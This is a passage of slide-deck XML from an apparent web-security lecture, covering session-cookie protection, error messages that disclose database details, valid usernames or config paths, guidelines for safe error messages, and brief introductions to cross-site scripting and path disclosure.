              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Do not trust user input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Cookies should not be used entirely for authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Use HTTP_REFERER to check for page origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Use USER_AGENT to check the user’s web browser (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> if the user is logged in using Internet Explorer, do not trust a request from the same user using Firefox – ask the user for password)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>HTTPS or other forms of encryption can be used to protect session cookie transmission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Messages</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Application needs to respond to error.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Some errors are made by users and can be corrected by users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Application needs to inform users about error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Error messages need to be informative</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Some errors are system related</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Error messages are not meant for users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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Messages</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Problem is: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Application often reveals too much information; more than is needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Default configuration of web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Example: an ODBC error showing error in SQL statement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Attractive for SQL injection</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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="Figure-17_1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="68263" y="-276225"/>
            <a:ext cx="8896350" cy="7134225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="3284538"/>
            <a:ext cx="4176713" cy="2879725"/>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Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>This message reveals about the type of database and the table column</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-GB"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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="Figure-17_3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="-26988"/>
            <a:ext cx="9791700" cy="7296151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522413" y="4930775"/>
            <a:ext cx="7010400" cy="4114800"/>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Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Another example here</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Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Failed authentication causes error to be displayed</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-GB"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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="Figure-17_4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9715500" cy="7000875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Figure-17_5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect r="43738"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191950" y="-476"/>
            <a:ext cx="5459099" cy="7000875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Oval 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1557338"/>
            <a:ext cx="2555875" cy="719137"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="FB2603"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Oval 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4284663" y="1628775"/>
            <a:ext cx="2879725" cy="792163"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="FB2603"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="447675" y="2676525"/>
            <a:ext cx="3403600" cy="1800225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>This page is displayed when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FB2603"/>
                </a:solidFill>
              </a:rPr>
              <a:t>invalid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t> username is entered</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5219700" y="2781300"/>
            <a:ext cx="3403600" cy="1800225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>This page is displayed when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FB2603"/>
                </a:solidFill>
              </a:rPr>
              <a:t>valid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t> username is entered</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2555875" y="4941887"/>
            <a:ext cx="5769934" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Such different error messages can tell a potential hacker whether the username he is trying is a valid one</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="Figure-17_6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="908720"/>
            <a:ext cx="8823325" cy="5086350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1155700" y="4221833"/>
            <a:ext cx="7010400" cy="877887"/>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Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Shows the path of config file!!!</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-GB"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Fixing this vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Application codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Functional codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Error handling codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Start looking at error strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Make sure they don’t reveal too much information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Extensive testing of error handling (most people do functional test and ignored error handling)</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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Guidelines for Error Messages</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Does the user have minimal information he needs for corrective action?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>. ‘your caps lock is on’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Does this message provide more information about the system than is available from other legitimate sources?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>. Showing the path of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> file </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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Guidelines for Error Messages</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Is each piece of information disclosed necessary/helpful to the legitimate user?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>. ODBC error messages is not necessary to end user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Does the corrective advice in the error message indirectly disclose sensitive information?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>. Failed login error message telling user that maximum password length is 8 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-S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SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can occur when the website takes information entered by the user and displays it in a web page without validating the input first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A hacker will enter specially crafted information that will cause the web page to generate unexpected output</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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539552" y="4221088"/>
            <a:ext cx="4104456" cy="793786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755576" y="5157192"/>
            <a:ext cx="3096344"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dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>User enters information in textbox or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>textarea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9" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5868144" y="4149080"/>
            <a:ext cx="2246650" cy="864096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5508104" y="5301208"/>
            <a:ext cx="3096344"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dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Information entered by user is displayed in web page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ight Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4860032" y="4437112"/>
            <a:ext cx="648072"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Path Disclosure</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web pages are normally located in a directory on the web server – the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Webroot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Full path disclosure – allowing the attacker to see the full path to the webpage (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
